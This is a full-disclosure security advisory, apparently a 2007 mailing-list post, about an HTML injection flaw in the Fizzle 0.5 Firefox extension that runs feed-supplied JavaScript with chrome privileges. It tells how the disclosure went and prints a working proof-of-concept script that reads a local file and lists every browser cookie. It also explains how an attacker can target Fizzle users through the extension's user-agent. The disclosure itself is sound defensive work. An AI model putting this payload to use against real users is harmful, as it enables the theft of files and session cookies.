fizzle-access.txt

`Fizzle allows feeds to use HTML in feed data resulting in JavaScript being  
run in the chrome: window with chrome permissions. The extension will  
convert HTML entities back to their ASCII equivalents thus < becomes <  
and so forth. Various feeds fields are vulnerable including the title which  
allows the code to execute when Fizzle is opened and no need for the feed  
to be viewed.  
  
The author Andy Frank was notified about the issue on 01/29/2007 we  
corresponded on the issue and I even offered to create a patch which I did.  
The patch did not meet his liking since the sanitation was too strict and  
made some feeds who use certain tags like <p> for formatting to lose their  
layout I told him it would be too difficult to sanitize the data unless its  
strict because so many attack variations could be used, and best thing to  
do is not allow HTML at all in the feed. On 02/20/2007 we ended discussions  
on this and I notified addons.mozilla.org about the problem and the  
developers lack of concern in fixing the extension or at least disabling  
its download so people would not download the extension. Well Mozilla  
didn't bother to remove it and have chosen to remove the extension in a  
future date when addons.mozilla.org is updated. Since then over 2,000+  
users have additionally downloaded the extension, invoking me to go  
full-disclosure about it.  
Fizzle 0.5 (previous versions likely vulnerable as well)  
https://addons.mozilla.org/firefox/1307/  
  
Below is the example I have tested out using version 0.5 and under nightly  
Firefox. Please note that the HTML entities must be present for the exploit  
to work. Place the below in your feed body and subscribe to the feed. View  
the feed in Fizzle. When testing make sure you clear the Fizzle cache in  
the fizzle folder under the Firefox profile.  
  
An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP  
request sends a custom user-agent which has the word 'Fizzle' in it.  
Detecting that keyword an attacker can serve a malicious copy of the feed  
instead.  
  
- -------------------------------------------------------------------------  
POC: Local File Reading and Cookie Reading (The HTML entities MUST be used)  
- -------------------------------------------------------------------------  
<script>  
  
function read(readfile)  
{  
var file = Components.classes["@mozilla.org/file/local;1"]  
.createInstance(Components.interfaces.nsILocalFile);  
file.initWithPath(readfile);  
var is =  
Components.classes["@mozilla.org/network/file-input-stream;1"]  
.createInstance(Components.interfaces.nsIFileInputStream);  
is.init(file, 0x01, 00004, null);  
var sis =  
Components.classes["@mozilla.org/scriptableinputstream;1"]  
.createInstance(Components.interfaces.nsIScriptableInputStream);  
sis.init(is);  
var output = sis.read(sis.available());  
alert(output);  
}  
read("C:\test.txt");  
  
function getCookies()  
{  
var cookieManager =  
Components.classes["@mozilla.org/cookiemanager;1"]  
.getService(Components.interfaces.nsICookieManager);  
var str = '';  
var iter = cookieManager.enumerator;  
while (iter.hasMoreElements())  
{  
var cookie = iter.getNext();  
if (cookie instanceof Components.interfaces.nsICookie)  
{  
str += "Host: " + cookie.host  
+ "\nName: " + cookie.name  
+ "\nValue: " + cookie.value  
+ "\n\n";  
}  
}  
alert(str);  
}  
getCookies()  
  
</script>  
- -------------------------------------------------------------------------  
  
I apologize for the blank emails before. Outblaze the provider for my other  
email was for some reason sending the email as blank. So using this account  
instead  
  
Regards,  
CM.  
  
  
  
____________________________________________________________________________________  
It's here! Your new message!   
Get new email alerts with the free Yahoo! Toolbar.  
http://tools.search.yahoo.com/toolbar/features/mail/  
`